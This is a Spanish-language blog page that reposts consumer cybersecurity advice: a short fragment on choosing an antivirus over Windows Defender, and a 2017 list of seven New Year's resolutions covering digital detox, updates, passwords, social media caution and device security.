Con el lanzamiento de Windows 10, Windows Defender se activa automáticamente cuando se detecta un programa antivirus incompatible o no se detecta ningún antivirus. Windows también insta a los usuarios a desinstalar los antivirus activos para activar Windows Defender en su lugar. Ten cuidado con las instrucciones que puedes obtener del sistema operativo de la PC con respecto a la seguridad. Podrías estar configurando una protección más débil. El argumento más utilizado a favor de las soluciones predeterminadas es la comodidad; sin embargo, gracias a las descargas rápidas y las opciones gratuitas de alto rendimiento, dispones de muchas otras excelentes opciones.

Depende de ti qué tipo de antivirus deseas instalar en la PC. Es mejor investigar antes de tomar una decisión definitiva. Para tomar una decisión con mayor facilidad, debes:
Verificar la puntuación que recibió el antivirus que te interesa en pruebas de organizaciones como AV-Test y AV Comparatives
Comprender las características ofrecidas e incluidas en el producto
Comparar precios

fuente:

lunes, 2 de enero de 2017

Cumple estas 7 resoluciones de Año Nuevo para un 2017 ciberseguro

Para muchos, fin de año es el momento perfecto para empezar de nuevo y mejorar ciertos aspectos. Como resultado, nos ocupamos de nuestras resoluciones de Año Nuevo y establecemos metas para los 12 meses que nos esperan. Y si bien bajar de peso, dejar de fumar o ir de una buena vez al gimnasio son resoluciones populares, sería bueno que esta vez pienses también en tu relación con la tecnología.




El problema con las resoluciones de Año Nuevo de hoy es que se han vuelto muy complejas. Como decía Confucio, “la vida es simple, pero insistimos en hacerla complicada”.
En vez de imponernos metas asequibles, nos obligamos a lograr demasiado al mismo tiempo. Tomemos como ejemplo la resolución de pérdida de peso: muchísimas personas se anotan en el gimnasio en diciembre, dejan de tomar alcohol y comer comida chatarra, y tratan de convertirse en el mejor chef de alimentación saludable; pero adoptar un enfoque tan extremo genera presión y frecuentemente conduce al fracaso. La clave está en objetivos pequeños, fáciles de lograr pero de impacto significativo, y limitados en el tiempo.

7 pasos para tener un 2017 ciberseguro

1. Otro tipo de desintoxicación

Algo que probablemente no habías considerado es una desintoxicación digital. Sí, una resolución de Año Nuevo y ser amable contigo mismo pueden ir de la mano; lograr un balance más saludable entre la vida en el plano físico y la vida en el mundo de la tecnología te permitirá cosechar recompensas tales como mejor concentración y sueño más reparador.
Varios estudios ya han demostrado que el uso de dispositivos móviles cerca de las horas de ir a dormir está asociado con una peor calidad de sueño; además, la larga exposición a la luz azul emitida por las pantallas de nuestros aparatos digitales puede dañar la vista.
La clave para tener éxito en este aspecto es establecer metas realistas. En vez de abandonar la tecnología por completo, elige un día a la semana para hacerlo. De manera alternativa, por qué no apagar todos tus dispositivos a las 7 PM cada noche, para pasar una velada relajada y con mejor sueño.

2. Ponte en forma en lo relativo a ciberseguridad

Los mismos principios aplican a las buenas prácticas. No hace falta que cambies todas tus contraseñas y cierres todas tus sesiones en redes sociales el primer día del año, pero sí que lo hagas en forma gradual para mejorar paso a paso tu seguridad en línea. Los siguientes pasos te ayudarán a concretarlo.

3. Instala una solución de seguridad

Quizá decidiste deshacerte del antivirus hace un tiempo o tu suscripción gratuita se terminó. Cualquiera sea el motivo por el que no tienes un software de seguridad, te sugerimos que decidas invertir en uno ahora. De lo contrario, es mayor el riesgo que corres de descargar malware sin darte cuenta o caer en un engaño.

4. Actualiza todo el software regularmente

Puede que las actualizaciones de software no siempre aparezcan en momentos convenientes, pero instalar parches en tiempo y forma es esencial para protegerte de ataques. Ya sean productos de Microsoft, navegadores, aplicaciones e incluso un sistema operativo, todo lo que usas en tus equipos debe estar actualizado, ya que de esta forma aprovechas las mejoras de seguridad que los fabricantes emiten para protegerlos mejor.

5. Empieza a volverte un as de las contraseñas

Si usas la misma contraseñas en todos tus dispositivos y cuentas, es hora de cambiarla, ya que las combinaciones débiles, reutilizadas y fáciles de adivinar facilitan el trabajo de los cibercriminales.
Comienza el Año Nuevo creando frases complejas y seguras para proteger tus servicios online, y da un paso más: configura un recordatorio periódico en tu calendario para cambiar tus contraseñas regularmente, por ejemplo cada dos o tres meses, y haz de su gestión un hábito. A tal fin, usar un gestor de contraseñas te hará la tarea más fácil y menos abrumadora.

6. Mantén tus cuentas en redes sociales, pero úsalas con cautela

No es necesario que borres tus perfiles y elimines todas tus publicaciones, pero sí que adoptes un enfoque más balanceado. Usa tus cuentas sobre una base adecuada en lugar de desplazarte a través de tu feed durante todo el día.
También es importante que seas consciente de lo que publicas en redes sociales y asegures tus cuentas, ya que seguramente no deseas contar demasiado. Anunciar todo lo que haces o a dónde te irás de vacaciones podría ser peligroso si esta información termina en manos de un cibercriminal, por lo que deberás revisar tus ajustes de seguridad y privacidad.

7. Aplica el pensamiento ciberseguro a todos tus dispositivos

De seguro sabes que tu smartphone también puede ser víctima de un ataque. Con todas las tecnologías conectadas a Internet en riesgo de ser comprometidas, es esencial que apliques las mismas prácticas de pensamiento y seguridad a todos tus dispositivos, no solo a tu PC.
Implementar estos pequeños pero efectivos cambios en tu comportamiento como usuario de tecnología podría hacer una gran diferencia en este 2017 que comienza. Recuerda que la carrera se gana con pasos progresivos y no con extremismos.

Fuente:
we live security